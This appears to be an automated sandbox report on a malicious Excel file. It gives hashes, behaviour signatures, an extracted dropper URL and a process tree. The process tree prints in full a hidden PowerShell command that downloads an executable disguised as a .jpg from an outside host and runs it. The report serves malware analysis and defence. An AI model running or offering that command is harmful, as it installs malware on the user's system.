Analysis

  • max time kernel
    130s
  • max time network
    63s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    08-07-2020 15:18

General

  • Target

    SecuriteInfo.com.Trojan.GenericKD.43452391.25180.12576.xls

  • Size

    112KB

  • MD5

    60829c4328334854863c5b7bf47fd7a9

  • SHA1

    3bdafc47b415aa9dd39b4d5442ad59c014d29af4

  • SHA256

    8b0d25741392e790fb8656e39374d5222e1154699ceae9d3a2851357428b4592

  • SHA512

    98efde59317b172a7636ce4d47d45707f67b90d5414a7d666f4fc85c47246af286aec87d2f86798e562de012a3ba466166f95eca13f121df13f81e521c8a6e0d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://crogtrt.com/IG/601377020.jpg

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.43452391.25180.12576.xls
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:892
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/601377020.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://crogtrt.com/IG/601377020.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        • Suspicious behavior: GetForegroundWindowSpam
        PID:288

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads